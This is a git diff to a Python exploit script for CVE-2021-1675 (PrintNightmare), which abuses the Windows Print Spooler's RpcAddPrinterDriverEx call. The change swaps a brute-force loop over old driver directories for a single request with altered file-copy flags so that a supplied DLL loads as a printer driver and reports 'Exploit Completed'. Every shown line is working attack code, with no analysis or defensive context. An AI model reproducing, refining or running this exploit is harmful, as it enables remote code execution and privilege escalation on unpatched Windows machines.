diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py
index 611606b..1525298 100644
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -84,18 +84,14 @@ def main(dce, pDriverPath, share, handle=NULL):
     resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
     print("[*] Stage0: {0}".format(resp['ErrorCode']))
 
-    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"
-    for i in range(1, 30):
-        try:
-            container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
-            resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
-            print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
-            if (resp['ErrorCode'] == 0):
-                print("[+] Exploit Completed")
-                sys.exit()
-        except Exception as e:
-            #print(e)
-            pass
+    # Just ask for a new driver with already installed files
+    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
+    flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
+    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
+    
+    print("[*] Stage1: {0}".format(resp['ErrorCode']))
+    if (resp['ErrorCode'] == 0):
+        print("[+] Exploit Completed")
 
 
 if __name__ == '__main__':